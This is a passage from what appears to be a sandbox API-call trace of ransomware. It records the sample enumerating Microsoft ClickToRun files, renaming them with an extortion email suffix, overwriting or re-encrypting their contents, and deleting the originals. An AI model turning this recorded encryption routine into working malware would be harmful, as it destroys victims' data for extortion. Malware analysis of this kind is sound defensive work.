[0178.964] lstrlenW (lpString=".jpg") returned 4 [0178.964] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.964] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0178.964] lstrlenW (lpString="ApiClient.dll") returned 13 [0178.964] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0178.965] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=162880) returned 1 [0178.965] CloseHandle (hObject=0x33c) returned 1 [0178.965] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll")) returned 0x20 [0178.965] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.965] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 71 [0178.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 71 [0178.965] lstrlenW (lpString=".doc") returned 4 [0178.965] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.965] lstrlenW (lpString=".docx") returned 5 [0178.965] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0178.965] lstrlenW (lpString=".pdf") returned 4 [0178.965] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.965] lstrlenW (lpString=".xls") returned 4 [0178.965] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.966] lstrlenW (lpString=".xlsx") returned 5 [0178.966] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0178.966] lstrlenW (lpString=".ppt") returned 4 [0178.966] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 71 [0178.966] lstrlenW (lpString=".zip") returned 4 [0178.966] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.966] lstrlenW (lpString=".rar") returned 4 [0178.966] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.966] lstrlenW (lpString=".bz2") returned 4 [0178.966] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.966] lstrlenW (lpString=".7z") returned 3 [0178.966] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 71 [0178.966] lstrlenW (lpString=".dbf") returned 4 [0178.966] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 71 [0178.966] lstrlenW (lpString=".1cd") returned 4 [0178.966] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 71 [0178.966] lstrlenW (lpString=".jpg") returned 4 [0178.966] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 71 [0178.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 71 [0178.966] lstrlenW (lpString=".doc") returned 4 [0178.966] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.966] lstrlenW (lpString=".docx") returned 5 [0178.966] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0178.967] lstrlenW (lpString=".pdf") returned 4 [0178.967] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.967] lstrlenW (lpString=".xls") returned 4 [0178.967] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.967] lstrlenW (lpString=".xlsx") returned 5 [0178.967] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0178.967] lstrlenW (lpString=".ppt") returned 4 [0178.967] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 71 [0178.967] lstrlenW (lpString=".zip") returned 4 [0178.967] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.967] lstrlenW (lpString=".rar") returned 4 [0178.967] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.967] lstrlenW (lpString=".bz2") returned 4 [0178.967] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.967] lstrlenW (lpString=".7z") returned 3 [0178.967] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 71 [0178.967] lstrlenW (lpString=".dbf") returned 4 [0178.967] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 71 [0178.967] lstrlenW (lpString=".1cd") returned 4 [0178.967] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 71 [0178.967] lstrlenW (lpString=".jpg") returned 4 [0178.967] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.968] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0178.968] lstrlenW (lpString="AppVCatalog.dll") returned 15 [0178.968] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0178.968] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=656088) returned 1 [0178.968] CloseHandle (hObject=0x33c) returned 1 [0178.968] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll")) returned 0x20 [0178.968] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.969] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 73 [0178.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 73 [0178.969] lstrlenW (lpString=".doc") returned 4 [0178.969] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.969] lstrlenW (lpString=".docx") returned 5 [0178.969] lstrcmpiW (lpString1=".docx", lpString2="g.dll") returned -1 [0178.969] lstrlenW (lpString=".pdf") returned 4 [0178.969] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.969] lstrlenW (lpString=".xls") returned 4 [0178.969] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.969] lstrlenW (lpString=".xlsx") returned 5 [0178.969] lstrcmpiW (lpString1=".xlsx", lpString2="g.dll") returned -1 [0178.969] lstrlenW (lpString=".ppt") returned 4 [0178.969] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 73 [0178.969] lstrlenW (lpString=".zip") returned 4 [0178.969] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.969] lstrlenW (lpString=".rar") returned 4 [0178.969] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.969] lstrlenW (lpString=".bz2") returned 4 [0178.969] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.969] lstrlenW (lpString=".7z") returned 3 [0178.969] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 73 [0178.970] lstrlenW (lpString=".dbf") returned 4 [0178.970] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 73 [0178.970] lstrlenW (lpString=".1cd") returned 4 [0178.970] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 73 [0178.970] lstrlenW (lpString=".jpg") returned 4 [0178.970] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 73 [0178.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 73 [0178.970] lstrlenW (lpString=".doc") returned 4 [0178.970] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.970] lstrlenW (lpString=".docx") returned 5 [0178.970] lstrcmpiW (lpString1=".docx", lpString2="g.dll") returned -1 [0178.970] lstrlenW (lpString=".pdf") returned 4 [0178.970] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.970] lstrlenW (lpString=".xls") returned 4 [0178.970] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.970] lstrlenW (lpString=".xlsx") returned 5 [0178.970] lstrcmpiW (lpString1=".xlsx", lpString2="g.dll") returned -1 [0178.970] lstrlenW (lpString=".ppt") returned 4 [0178.970] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 73 [0178.970] lstrlenW (lpString=".zip") returned 4 [0178.970] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.970] lstrlenW (lpString=".rar") returned 4 [0178.971] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.971] lstrlenW (lpString=".bz2") returned 4 [0178.971] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.971] lstrlenW (lpString=".7z") returned 3 [0178.971] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 73 [0178.971] lstrlenW (lpString=".dbf") returned 4 [0178.971] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 73 [0178.971] lstrlenW (lpString=".1cd") returned 4 [0178.971] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 73 [0178.971] lstrlenW (lpString=".jpg") returned 4 [0178.971] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.971] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0178.971] lstrlenW (lpString="appvcleaner.exe") returned 15 [0178.971] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0178.972] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=2054872) returned 1 [0178.972] CloseHandle (hObject=0x33c) returned 1 [0178.972] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe")) returned 0x20 [0178.972] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.972] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0178.973] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0178.973] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfc64 | out: lpNewFilePointer=0x0) returned 1 [0178.973] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfc24 | out: lpNewFilePointer=0x0) returned 1 [0178.973] ReadFile (in: hFile=0x33c, lpBuffer=0x3f3a058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3f3a058*, lpNumberOfBytesRead=0x34dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0179.153] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0xa739d, lpNewFilePointer=0x0, dwMoveMethod=0x34dfc24 | out: lpNewFilePointer=0x0) returned 1 [0179.153] ReadFile (in: hFile=0x33c, lpBuffer=0x3f7a058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3f7a058*, lpNumberOfBytesRead=0x34dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0179.191] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x34dfc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.191] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x1b5ad8, lpNewFilePointer=0x0, dwMoveMethod=0x34dfc24 | out: lpNewFilePointer=0x0) returned 1 [0179.191] ReadFile (in: hFile=0x33c, lpBuffer=0x3fba058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3fba058*, lpNumberOfBytesRead=0x34dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0179.487] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0179.488] WriteFile (in: hFile=0x33c, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xc010a, lpNumberOfBytesWritten=0x34dfca8, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfca8*=0xc010a, lpOverlapped=0x0) returned 1 [0179.512] SetEndOfFile (hFile=0x33c) returned 1 [0179.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40000) returned 0x44350b8 [0179.516] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfc74 | out: lpNewFilePointer=0x0) returned 1 [0179.516] WriteFile (in: hFile=0x33c, lpBuffer=0x44350b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34dfc80, lpOverlapped=0x0 | out: lpBuffer=0x44350b8*, lpNumberOfBytesWritten=0x34dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0179.736] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0xa739d, lpNewFilePointer=0x0, dwMoveMethod=0x34dfc74 | out: lpNewFilePointer=0x0) returned 1 [0179.736] WriteFile (in: hFile=0x33c, lpBuffer=0x44350b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34dfc80, lpOverlapped=0x0 | out: lpBuffer=0x44350b8*, lpNumberOfBytesWritten=0x34dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0179.738] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x1b5ad8, lpNewFilePointer=0x0, dwMoveMethod=0x34dfc74 | out: lpNewFilePointer=0x0) returned 1 [0179.738] WriteFile (in: hFile=0x33c, lpBuffer=0x44350b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34dfc80, lpOverlapped=0x0 | out: lpBuffer=0x44350b8*, lpNumberOfBytesWritten=0x34dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0179.740] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44350b8 | out: hHeap=0x680000) returned 1 [0179.742] CloseHandle (hObject=0x33c) returned 1 [0179.742] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0179.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 73 [0179.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 73 [0179.742] lstrlenW (lpString=".doc") returned 4 [0179.742] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0179.742] lstrlenW (lpString=".docx") returned 5 [0179.742] lstrcmpiW (lpString1=".docx", lpString2="r.exe") returned -1 [0179.742] lstrlenW (lpString=".pdf") returned 4 [0179.742] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0179.742] lstrlenW (lpString=".xls") returned 4 [0179.742] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0179.742] lstrlenW (lpString=".xlsx") returned 5 [0179.742] lstrcmpiW (lpString1=".xlsx", lpString2="r.exe") returned -1 [0179.742] lstrlenW (lpString=".ppt") returned 4 [0179.742] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0179.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 73 [0179.743] lstrlenW (lpString=".zip") returned 4 [0179.743] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0179.743] lstrlenW (lpString=".rar") returned 4 [0179.743] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0179.743] lstrlenW (lpString=".bz2") returned 4 [0179.743] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0179.743] lstrlenW (lpString=".7z") returned 3 [0179.743] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0179.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 73 [0179.743] lstrlenW (lpString=".dbf") returned 4 [0179.743] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0179.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 73 [0179.743] lstrlenW (lpString=".1cd") returned 4 [0179.743] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0179.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 73 [0179.743] lstrlenW (lpString=".jpg") returned 4 [0179.743] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0179.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 73 [0179.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 73 [0179.743] lstrlenW (lpString=".doc") returned 4 [0179.743] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0179.743] lstrlenW (lpString=".docx") returned 5 [0179.743] lstrcmpiW (lpString1=".docx", lpString2="r.exe") returned -1 [0179.743] lstrlenW (lpString=".pdf") returned 4 [0179.743] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0179.743] lstrlenW (lpString=".xls") returned 4 [0179.743] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0179.743] lstrlenW (lpString=".xlsx") returned 5 [0179.743] lstrcmpiW (lpString1=".xlsx", lpString2="r.exe") returned -1 [0179.743] lstrlenW (lpString=".ppt") returned 4 [0179.743] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0179.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 73 [0179.743] lstrlenW (lpString=".zip") returned 4 [0179.743] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0179.743] lstrlenW (lpString=".rar") returned 4 [0179.744] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0179.744] lstrlenW (lpString=".bz2") returned 4 [0179.744] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0179.744] lstrlenW (lpString=".7z") returned 3 [0179.744] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0179.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 73 [0179.744] lstrlenW (lpString=".dbf") returned 4 [0179.744] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0179.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 73 [0179.744] lstrlenW (lpString=".1cd") returned 4 [0179.744] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0179.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 73 [0179.744] lstrlenW (lpString=".jpg") returned 4 [0179.744] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0179.744] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.744] lstrlenW (lpString="C2RUI.en-us.dll") returned 15 [0179.744] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0179.745] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=902328) returned 1 [0179.745] CloseHandle (hObject=0x33c) returned 1 [0179.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll")) returned 0x20 [0179.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0179.745] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0179.745] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0179.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0179.745] GetLastError () returned 0x0 [0179.745] ReadFile (in: hFile=0x33c, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0xdc4b8, lpOverlapped=0x0) returned 1 [0181.306] WriteFile (in: hFile=0x350, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xdc4c0, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xdc4c0, lpOverlapped=0x0) returned 1 [0181.668] ReadFile (in: hFile=0x33c, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0181.668] WriteFile (in: hFile=0x350, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xf2, lpOverlapped=0x0) returned 1 [0181.668] SetEndOfFile (hFile=0x350) returned 1 [0181.668] CloseHandle (hObject=0x350) returned 1 [0181.668] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0181.668] SetEndOfFile (hFile=0x33c) returned 1 [0182.006] CloseHandle (hObject=0x33c) returned 1 [0182.006] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0182.027] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll")) returned 1 [0182.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 73 [0182.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft 